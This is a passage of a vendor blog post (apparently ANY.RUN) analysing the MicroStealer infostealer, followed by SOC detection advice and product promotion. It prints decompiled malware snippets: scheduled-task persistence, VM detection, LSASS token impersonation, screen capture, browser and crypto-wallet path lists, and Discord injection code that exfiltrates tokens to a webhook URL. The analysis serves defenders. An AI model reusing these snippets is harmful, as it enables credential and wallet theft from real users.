\"\\\\model\\\\jre\\\\bin\\\\miicrosoft.exe\"; \n    String string3 = string + \"\\\\soft.jar\"; \n    String string4 = System.getProperty(\"user.name\"); \n    String string5 = \"App_\" + string4; \n    String string6 = String.format(\"schtasks \/create \/tn \\\"%s\\\" \/tr \\\"\\\\\\\"%s\\\\\\\" -jar \\\\\\\"%s\\\\\\\"\\\" \/sc ONLOGON \/delay 0000:05 \/rl HIGHEST \/f\", string5, string2, string3); \n    Process process = Runtime.getRuntime().exec(string6); \n    process.waitFor(); \n} <\/code><\/pre>\n\n\n\n<p>The command creates a task in&nbsp;<strong>Windows Task Scheduler<\/strong>&nbsp;with the&nbsp;<strong>ONLOGON trigger<\/strong>&nbsp;(executed when the user logs in), a&nbsp;<strong>5-second delay<\/strong>, and&nbsp;<strong>highest privileges (HIGHEST)<\/strong>. As a&nbsp;result, the malwareautomatically&nbsp;resumes operation even after the system is&nbsp;rebooted.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Virtual Machine Detection&nbsp;<\/h3>\n\n\n\n<p>MicroStealer checks the execution environment for processes and services typically associated with <strong>virtual machines<\/strong>. If at least one match is found, execution is terminated immediately.<\/p>\n\n\n\n<p>Despite these anti-analysis checks, the sample executes successfully in the <a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>ANY.RUN sandbox<\/strong><\/a>, allowing its behavior to be fully exposed during analysis.<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nStop paying for incidents that <span class=\"highlight\"> could be prevented<\/span> \n<br><span class=\"highlight\"> Expose threats <\/span> that bypass traditional security controls\n&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=microstealer-technical-analysis&#038;utm_term=120326&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nIntegrate in your SOC\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>This makes it possible to&nbsp;observe&nbsp;the&nbsp;malware\u2019s&nbsp;logic in action and extract valuable&nbsp;<strong>IOCs&nbsp;<\/strong>for further detection and threat hunting.&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">private static void checkEnvironment(String str) throws Exception { \n    String&#091;] strArr = new String&#091;13]; \n    strArr&#091;0]  = \"vmwaretray\"; \n    strArr&#091;1]  = \"vmwareuser\"; \n    strArr&#091;2]  = \"vgauthservice\"; \n    strArr&#091;3]  = \"vmacthlp\"; \n    strArr&#091;4]  = \"vmsrvc\"; \n    strArr&#091;5]  = \"vmusrvc\"; \n    strArr&#091;6]  = \"vmtoolsd\"; \n    strArr&#091;7]  = \"vboxservice\"; \n    strArr&#091;8]  = \"vboxtray\"; \n    strArr&#091;9]  = \"qemu-ga\"; \n    strArr&#091;10] = \"xenservice\"; \n    strArr&#091;11] = \"prl_cc\"; \n    strArr&#091;12] = \"prl_tools\"; \n \n    boolean anyMatch = Arrays.asList(strArr) \n        .stream() \n        .anyMatch(v1 -> str.toLowerCase().contains(v1)); \n \n    if (anyMatch) { \n        Runtime.getRuntime().halt(0); \n    } \n} <\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Browser Data Theft&nbsp;<\/h3>\n\n\n\n<p>MicroStealer supports a wide range of <strong>Chromium-based browsers<\/strong>, as well as <strong>Opera<\/strong> and <strong>Opera GX<\/strong>. For each detected browser, it accesses the user\u2019s profile data and then extracts protected information using <strong>Windows DPAPI<\/strong>.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>put(\"Chrome\",&nbsp;localAppData&nbsp;+&nbsp;\"\\\\Google\\\\Chrome\\\\User&nbsp;Data\");&nbsp;\nput(\"Brave\",&nbsp;localAppData&nbsp;+&nbsp;\"\\\\BraveSoftware\\\\Brave-Browser\\\\User&nbsp;Data\");&nbsp;\nput(\"Edge\",&nbsp;localAppData&nbsp;+&nbsp;\"\\\\Microsoft\\\\Edge\\\\User&nbsp;Data\");&nbsp;\nput(\"Vivaldi\",&nbsp;localAppData&nbsp;+&nbsp;\"\\\\Vivaldi\\\\User&nbsp;Data\");&nbsp;\nput(\"Yandex\",&nbsp;localAppData&nbsp;+&nbsp;\"\\\\Yandex\\\\YandexBrowser\\\\User&nbsp;Data\");&nbsp;\nput(\"Chromium\",&nbsp;localAppData&nbsp;+&nbsp;\"\\\\Chromium\\\\User&nbsp;Data\");&nbsp;\n<em>\/\/ ...<\/em>&nbsp;\n&nbsp;\nput(\"Opera\",&nbsp;appData&nbsp;+&nbsp;\"\\\\Opera&nbsp;Software\\\\Opera Stable\");&nbsp;\nput(\"Opera GX\",&nbsp;appData&nbsp;+&nbsp;\"\\\\Opera&nbsp;Software\\\\Opera GX Stable\");&nbsp;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Interaction with LSASS&nbsp;<\/h3>\n\n\n\n<p>When <strong>LSA protection<\/strong> is disabled (<strong>RunAsPPL = 0<\/strong>), the malware attempts to obtain elevated privileges by interacting with the <strong>lsass.exe<\/strong> process. It enables <strong>SeDebugPrivilege<\/strong>, searches for <strong>LSASS<\/strong> in the process list, and then duplicates its security token and impersonates the token in the current thread:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">Advapi32Util.registryGetIntValue(HKEY_LOCAL_MACHINE,  \n    \"SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\", \"RunAsPPL\"); \n \naf.INSTANCE.RtlAdjustPrivilege(SeDebugPrivilege, true, false, intByReference); \n \nWinNT.HANDLE snapshot = Kernel32.INSTANCE.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); \nwhile (Kernel32.INSTANCE.Process32Next(snapshot, processEntry)) { \n    if (\"lsass.exe\".equalsIgnoreCase(Native.toString(processEntry.szExeFile))) { \n        HANDLE hProcess = Kernel32.INSTANCE.OpenProcess(PROCESS_QUERY_INFORMATION, false, processEntry.th32ProcessID); \n         \n        Advapi32.INSTANCE.OpenProcessToken(hProcess, TOKEN_DUPLICATE, tokenHandle); \n        Advapi32.INSTANCE.DuplicateToken(tokenHandle.getValue(), SecurityImpersonation, duplicatedToken); \n        Advapi32.INSTANCE.ImpersonateLoggedOnUser(duplicatedToken.getValue()); \n        break; \n    } \n} <\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Screen Capture&nbsp;<\/h3>\n\n\n\n<p>The malware captures the user\u2019s current screen using <strong>java.awt.Robot<\/strong>. The resulting image is saved in <strong>PNG format<\/strong> and then packaged into a <strong>ZIP archive<\/strong> for later exfiltration.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">Robot robot = new Robot(); \nRectangle screen = new Rectangle(Toolkit.getDefaultToolkit().getScreenSize()); \nBufferedImage screenshot = robot.createScreenCapture(screen); \nImageIO.write(screenshot, \"png\", new File(\"screenshot.png\")); <\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Additional&nbsp;MicroStealer&nbsp;Functionality&nbsp;<\/h3>\n\n\n\n<p>MicroStealer targets both <strong>browser-based cryptocurrency wallet extensions<\/strong> (via <strong>Local Extension Settings<\/strong>) and <strong>desktop wallet applications<\/strong>. The wallet files are copied in full, without any additional processing.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>put(\"Metamask\",&nbsp;\"\\\\Local&nbsp;Extension Settings\\\\nkbihfbeogaeaoehlefnkodbefgpgknn\");&nbsp;\nput(\"Phantom\",&nbsp;\"\\\\Local&nbsp;Extension Settings\\\\bfnaelmomeimhlpmgjnjophhpkkoljpa\");&nbsp;\nput(\"Trust Wallet\",&nbsp;\"\\\\Local&nbsp;Extension Settings\\\\egjidjbpglichdcondbcbdnbeeppgdph\");&nbsp;\nput(\"Coinbase\",&nbsp;\"\\\\Local&nbsp;Extension Settings\\\\hnfanknocfeofbddgcijnmhnfnkdnaad\");&nbsp;\n<em>\/\/ ...<\/em>&nbsp;\n&nbsp;\nput(\"Exodus\",&nbsp;appData&nbsp;+&nbsp;\"\\\\Exodus\\\\exodus.wallet\");&nbsp;\nput(\"Electrum\",&nbsp;appData&nbsp;+&nbsp;\"\\\\Electrum\\\\wallets\");&nbsp;\nput(\"AtomicWallet\",&nbsp;appData&nbsp;+&nbsp;\"\\\\atomic\\\\Local&nbsp;Storage\\\\leveldb\");&nbsp;\nput(\"Ethereum\",&nbsp;appData&nbsp;+&nbsp;\"\\\\Ethereum\\\\keystore\");&nbsp;\nput(\"Jaxx\",&nbsp;appData&nbsp;+&nbsp;\"\\\\com.liberty.jaxx\\\\IndexedDB\\\\file__0.indexeddb.leveldb\");&nbsp;\n<em>\/\/ ...<\/em>&nbsp;<\/code><\/pre>\n\n\n\n<p>JavaScript code is injected into the&nbsp;<strong>Discord desktop application<\/strong>, using&nbsp;<strong>Webpack Chunk Injection<\/strong>&nbsp;to access internal client modules and the&nbsp;<strong>Chrome DevTools Protocol (CDP)<\/strong>&nbsp;to intercept network&nbsp;requests and monitor user activity.&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>const<\/strong>&nbsp;{ session,&nbsp;BrowserWindow&nbsp;}&nbsp;=&nbsp;require('electron');&nbsp;\n<strong>const<\/strong>&nbsp;C&nbsp;=&nbsp;{&nbsp;webhook:&nbsp;{&nbsp;url:&nbsp;'https:\/\/78smp.com\/m\/'&nbsp;} };&nbsp;\n&nbsp;\n<em>\/\/ token extraction from webpack<\/em>&nbsp;\nwindow.webpackChunkdiscord_app.push(&#091;&nbsp;\n&nbsp;&nbsp;&nbsp; &#091;Math.random()],&nbsp;{},&nbsp;\n&nbsp;&nbsp;&nbsp; (r)&nbsp;<strong>=&gt;<\/strong>&nbsp;{&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>for<\/strong>&nbsp;(<strong>const<\/strong>&nbsp;mid&nbsp;<strong>in<\/strong>&nbsp;r.c) {&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>const<\/strong>&nbsp;getToken&nbsp;=&nbsp;r.c&#091;mid]?.exports?.default?.getToken;&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>if<\/strong>&nbsp;(<strong>typeof<\/strong>&nbsp;getToken&nbsp;===&nbsp;'function')&nbsp;<strong>return<\/strong>&nbsp;getToken();&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }&nbsp;\n&nbsp;&nbsp;&nbsp; }&nbsp;\n]);&nbsp;\n&nbsp;\n<em>\/\/ CDP-based network interception<\/em>&nbsp;\nw.webContents.debugger.attach('1.3');&nbsp;\nw.webContents.debugger.on('message',&nbsp;<strong>async<\/strong>&nbsp;(_,&nbsp;m,&nbsp;p)&nbsp;<strong>=&gt;<\/strong>&nbsp;{&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<em>\/\/ \/auth\/login, \/mfa\/totp, \/users\/@me<\/em>&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<em>\/\/ exfiltration to Discord webhook<\/em>&nbsp;\n});&nbsp;<\/code><\/pre>\n\n\n\n<p>The malware intercepts events related to <strong>logins, credential changes, 2FA enablement, and the addition of payment methods<\/strong> such as Stripe and Braintree\/PayPal. In addition, it collects account metadata such as badges, Nitro level, and similar attributes, which may indicate an attempt to profile victims.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Steam Account Profiling&nbsp;<\/h3>\n\n\n\n<p>The malware&nbsp;also collects information about the victim\u2019s&nbsp;<strong>Steam account<\/strong>. Using&nbsp;a&nbsp;hardcoded API key, the stealer queries the&nbsp;Steam Web API&nbsp;to&nbsp;retrieve the&nbsp;profile level, number of owned games, and account creation date.&nbsp;<\/p>\n\n\n\n<p>While this information does not provide direct access to the account on its own, it may be used to assess the victim\u2019s value and prioritize targets, similarly to the profiling observed in Discord.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">String&nbsp;apiKey&nbsp;=&nbsp;\"440D7F4D810EF9298D25EDDF37C1F902\";&nbsp;\n&nbsp;\nString&nbsp;levelUrl&nbsp;=&nbsp;String.format(&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;\"https:\/\/api.steampowered.com\/IPlayerService\/GetSteamLevel\/v1\/?key=%s&amp;steamid=%s\",&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;apiKey,&nbsp;steamId&nbsp;\n);&nbsp;\n&nbsp;\nString&nbsp;gamesUrl&nbsp;=&nbsp;String.format(&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;\"https:\/\/api.steampowered.com\/IPlayerService\/GetOwnedGames\/v1\/?key=%s&amp;steamid=%s\",&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;apiKey,&nbsp;steamId&nbsp;\n);&nbsp;\n&nbsp;\nString&nbsp;summaryUrl&nbsp;=&nbsp;String.format(&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;\"https:\/\/api.steampowered.com\/ISteamUser\/GetPlayerSummaries\/v0002\/?key=%s&amp;steamids=%s\",&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;apiKey,&nbsp;steamId&nbsp;\n);&nbsp;<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Detecting&nbsp;MicroStealer&nbsp;Early: A Practical Investigation&nbsp;Loop&nbsp;<\/h2>\n\n\n\n<p>MicroStealer highlights a familiar problem for many security teams: new malware families often appear before reliable signatures or threat intelligence become widely available.<\/p>\n\n\n\n<p>When that happens, defenders are&nbsp;left with suspicious files, unclear alerts, and limited external context. Without fast verification, attackers can quietly collect credentials, session tokens, and other sensitive data while investigations stall.&nbsp;<\/p>\n\n\n\n<p>Early detection depends on how quickly a team can move from&nbsp;<strong>uncertain signals to confirmed malicious behavior<\/strong>.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">1. Monitoring: Spot Suspicious Infrastructure&nbsp;Early&nbsp;<\/h3>\n\n\n\n<p>Infostealers often rely on external services and fresh infrastructure for data exfiltration. In the case of MicroStealer, stolen information is transmitted through <strong>Discord webhooks and attacker-controlled servers<\/strong>.<\/p>\n\n\n\n<p>Monitoring for newly observed infrastructure&nbsp;and suspicious connections can help teams catch early signs of compromise before&nbsp;the malware&nbsp;fully completes its collection and exfiltration stages.&nbsp;<\/p>\n\n\n\n<p>ANY.RUN\u2019s&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktotifeedslanding\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Threat Intelligence&nbsp;Feeds<\/strong><\/a>&nbsp;continuously&nbsp;surface&nbsp;newly observed indicators based on telemetry and submissions from&nbsp;<strong>15,000+ organizations and 600,000+ security professionals<\/strong>.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"466\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3-1024x466.png\" alt=\"\" class=\"wp-image-18796\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3-1024x466.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3-300x136.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3-768x349.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3-370x168.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3-270x123.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3-740x337.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3.png 1425w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>100% actionable IOCs delivered by TI&nbsp;Feeds&nbsp;to your existing stack<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>For SOC teams, this means fewer blind spots in monitoring and earlier visibility into suspicious domains, IPs, and attacker infrastructure.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\n<span class=\"highlight\">99% unique\n<\/span> threat data for your SOC<br>Catch attacks early to <span class=\"highlight\"> protect your business<\/span> \n&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=microstealer-technical-analysis&#038;utm_term=120326&#038;utm_content=linktotifeedslanding#contact-sales\" rel=\"noopener\" target=\"_blank\">\nIntegrate TI Feeds\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h3 class=\"wp-block-heading\">2. Triage: Confirm Behavior Instead of Guessing&nbsp;<\/h3>\n\n\n\n<p>New malware families like MicroStealer often lack <strong>clear static signatures or reliable reputation data<\/strong>, which slows down traditional investigation workflows.<\/p>\n\n\n\n<p>Instead of&nbsp;relying only on static verdicts, analysts can quickly confirm what a suspicious file&nbsp;actually does&nbsp;by executing it in a controlled environment.&nbsp;<\/p>\n\n\n\n<p>Running the sample in the&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN&nbsp;interactive sandbox<\/a>&nbsp;reveals the full execution chain, including:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>NSIS installer delivering the payload&nbsp;<\/li>\n\n\n\n<li>Electron loader extracting the JAR module<\/li>\n\n\n\n<li>Java stealer executing its data collection logic&nbsp;&nbsp;<\/li>\n\n\n\n<li>Attempts to&nbsp;steal browser credentials and wallet data&nbsp;<\/li>\n\n\n\n<li>Communication with&nbsp;Discord webhooks and external servers&nbsp;<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"737\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33-1024x737.png\" alt=\"\" class=\"wp-image-19138\" style=\"width:568px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33-1024x737.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33-300x216.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33-768x553.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33-370x266.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33-270x194.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33-740x533.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33.png 1536w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Relevant IOCs automatically gathered in one tab inside ANY.RUN sandbox<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Within minutes, analysts can observe the <strong>complete attack chain<\/strong>, extract <strong>reliable IOCs<\/strong>, and determine whether the sample poses a real threat.<\/p>\n\n\n\n<p>For SOC teams, this replaces guesswork with <strong>behavior-based evidence<\/strong>, helping reduce investigation time and avoid unnecessary escalations.<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\n<span class=\"highlight\">74% of Fortune 100 companies \n<\/span>rely on ANY.RUN <br>for earlier detection and <span class=\"highlight\">faster SOC<\/span> response \n&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=microstealer-technical-analysis&#038;utm_term=120326&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nPower your SOC now\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h3 class=\"wp-block-heading\">3. Threat Hunting: Expand Detection from One Sample&nbsp;<\/h3>\n\n\n\n<p>Once a stealer like&nbsp;MicroStealer&nbsp;is confirmed, the next step is ensuring it&nbsp;<strong>does not appear elsewhere&nbsp;in the environment<\/strong>.&nbsp;<\/p>\n\n\n\n<p>Using&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Threat Intelligence&nbsp;Lookup<\/strong><\/a>, analysts can pivot from the&nbsp;initial&nbsp;indicators to discover&nbsp;related infrastructure, connected samples, and similar activity patterns.&nbsp;<\/p>\n\n\n\n<p>This allows teams to:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>identify&nbsp;related domains and IP addresses&nbsp;<\/li>\n\n\n\n<li>find&nbsp;other samples using the same infrastructure&nbsp;<\/li>\n\n\n\n<li>detect&nbsp;variants using the same delivery chain&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktolookup#{%22query%22:%22threatName:%5C%22microstealer%5C%22%22,%22dateRange%22:180}\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>threatName:&#8221;microstealer&#8221;<\/strong><\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"565\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1024x565.png\" alt=\"ANY.RUN\u00a0TI\u00a0Lookup\u00a0demonstrates\u00a0relevant sandbox sessions with MicroStealer\u00a0\" class=\"wp-image-19100\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1024x565.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-300x165.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-768x423.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1536x847.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-2048x1129.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-370x204.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-270x149.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-740x408.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN&nbsp;TI&nbsp;Lookup&nbsp;demonstrates&nbsp;relevant sandbox sessions with MicroStealer<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>By pivoting across infrastructure&nbsp;and behavior, organizations can transform a single investigation into&nbsp;<strong>broader detection coverage across the environment<\/strong>.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Conclusion: Faster Clarity Means Lower Risk&nbsp;<\/h2>\n\n\n\n<p>MicroStealer&nbsp;demonstrates how modern infostealers combine&nbsp;layered delivery chains, heavy obfuscation, and anti-analysis techniques&nbsp;to slow down detection.&nbsp;<\/p>\n\n\n\n<p>However, even complex malware&nbsp;becomes manageable when teams can quickly move from&nbsp;uncertain alerts to clear behavioral evidence.&nbsp;<\/p>\n\n\n\n<p>By combining&nbsp;<strong>early monitoring, fast behavioral triage, and targeted threat hunting<\/strong>, security teams can uncover emerging threats faster,&nbsp;reduce investigation time, and limit the risk of data theft inside corporate environments.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktoenterprise#contact-sales\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Bring speed and clarity to your SOC with ANY.RUN \u279c<\/strong><\/a>&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">About&nbsp;ANY.RUN&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a>, a leading provider of&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">interactive malware&nbsp;analysis<\/a>&nbsp;and threat intelligence solutions, fits naturally into modern SOC workflows and supports investigations from&nbsp;initial&nbsp;alert to final containment.&nbsp;<\/p>\n\n\n\n<p>It allows teams to safely execute suspicious files and URLs,&nbsp;observe&nbsp;real behavior in an interactive environment, enrich indicators with immediate context through&nbsp;<a 